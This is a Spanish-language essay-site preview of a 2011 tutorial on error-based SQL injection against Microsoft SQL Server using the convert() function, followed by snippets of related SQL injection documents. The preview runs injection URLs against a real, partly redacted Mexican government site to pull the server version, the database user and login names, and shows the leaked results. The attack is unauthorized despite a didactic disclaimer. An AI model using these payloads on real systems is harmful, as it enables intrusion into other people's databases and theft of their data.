Sql injection

Páginas: 4 (762 palabras) Publicado: 25 de enero de 2012
25 Nov 2011 SQL Injection en SQL Server y función convert() Este artículo esta escrito con fines didácticos y nunca para incitar o promover que el lector use esto con fines delictivos. No me hagoresponsable por el uso que le das a esta información. Anteriormente hemos tratado temas de SQL Injection, sin embargo siempre nos basamos en el sistema de gestión de base de datos (SGBD) MySql así queesta vez dedicaremos un espacio para introducirnos en ataques a sistemas SQL SERVER. Igual que en artículos anteriores veremos la forma de listar las tablas, campos y registros que conforman la basede datos a atacar. Las pruebas fueron realizadas sobre un sitio real, sin embargo omitiré el nombre y dirección solo pondré impresiones de pantalla del resultado del ataque.
No veremos BLIND SQLI yaque nos basaremos en los errores devueltos por el servidor, para generar estos errores inyectaremos la función convert() que sirve para hacer conversiones entre tipos de datos, por tanto pediremosque convierta un tipo de dato totalmente incompatible. La primera prueba que nos servirá como testeo es pedir la versión de SQL con ayuda de @@version que además será útil para saber la sintaxis quedebemos usar. http://www.xxxxxxxxx.gob.mx/hacienda/Canal.asp?cve_canal=12834 and 1=convert(int,@@version) -- h

Versión: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Al final incluimos el carácter comentario “--” para que omita el resto de la consulta.Sacamos el usuario con el que la aplicación esta corriendo SQL Server http://www.xxxxxxxxx.gob.mx/hacienda/Canal.asp?cve_canal=12834 and 1=convert(int,system_user) -- h

Usuario: portalconsultasSacamos los permisos del usuario con el que esta corriendo SQL Server. http://www.xxxxxxxxx.gob.mx/hacienda/Canal.asp?cve_canal=12834 and 1=convert(int,(SELECT top 1 name FROM master..syslogins )) -- h...
Leer documento completo

Regístrate para leer el documento completo.

Estos documentos también te pueden resultar útiles

  • Sql Injection

    ...> L > E' * 6 (" 6") " . " " " " 6 ( 4 # " F " . & " " 6 " * 6 " " " "9 9 " " " " " & 6 " < " ) " 4 " " " + " " D Warning: SQL error: [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '')'., SQL state 37000 in SQLExecDirect in php/db_odbc.inc on line 61 Database error: Invalid SQL: Select * from usuario where (usuario.login=''') ODBC Error: 1 (General...

    Leer más
    874 Palabras 4 Páginas
  • Sql Injection

    ...SQL Injection Introducción Tres años atrás, publicaba en mi sitio personal de Internet, un documento técnico titulado “Técnicas de SQL Injection: Un Repaso” (Ver Referencias). En el mismo, mencionaba con varios ejemplos y bastante contenido, algunas de las técnicas mas conocidas hasta el momento por la comunidad de profesionales y curiosos relacionados de algún modo con la seguridad informática. Probablemente su contenido no haya...

    Leer más
    707 Palabras 3 Páginas
  • sql injection

    ...SQL INJECTION  Qué es?  Como actúa  Protegerse o evitar Qué es? Se llama SQL Injection a una vulnerabilidad informática en el nivel de base de datos de una aplicación dinámica. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con código embebido SQL. Dónde ocurre? La intrusión ocurre durante la ejecución del programa vulnerable, ya sea, en computadores de...

    Leer más
    524 Palabras 3 Páginas
  • SQL Injection

    ...SISTEMAS INFORMÁTICOS Curso de Desarrollo de Aplicaciones II Prof. Ing. José Padilla Duarte SQL Injection Trabajo elaborado por: 10311025 Molinares Molina Jesús Ernesto Grupo SI4 - 1 Hermosillo, Sonora, México. 02/12/2012 Inyección SQL La inyección SQL consiste en la modificación del comportamiento de nuestras...

    Leer más
    1389 Palabras 6 Páginas
  • SQL Injection en SQL Server y función convert()

    ...25 Nov 2011 SQL Injection en SQL Server y función convert() Este artículo esta escrito con fines didácticos y nunca para incitar o promover que el lector use esto con fines delictivos. No me hago responsable por el uso que le das a esta información. Anteriormente hemos tratado temas de SQL Injection, sin embargo siempre nos basamos en el sistema de gestión de base de datos (SGBD) MySql así que esta vez dedicaremos un...

    Leer más
    744 Palabras 3 Páginas
  • Sql injection

    ...SQL Injection Inyección SQL Es una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté incrustado dentro de otro. Una...

    Leer más
    3402 Palabras 14 Páginas
  • Sql injection

    ...Inyección SQL Es una vulnerabilidad informática en el nivel de la validación de las entradas a la base de datos de una aplicación. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con código SQL. Es, de hecho, un error de una clase más general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que esté incrustado dentro de otro. Descripción Una inyección SQL sucede...

    Leer más
    409 Palabras 2 Páginas
  • Sql injection

    ...Advanced SQL injection to operating system full control Bernardo Damele Assumpção Guimarães Black Hat Briefings Europe Amsterdam (NL) – April 16, 2009 Who I am Bernardo Damele Assumpção Guimarães: • • • • Proud father IT security engineer sqlmap lead developer MySQL UDF repository developer 2 SQL injection definition • SQL injection attacks are a type of injection attack, in...

    Leer más
    1988 Palabras 8 Páginas

OTRAS TAREAS POPULARES

Conviértase en miembro formal de Buenas Tareas

INSCRÍBETE - ES GRATIS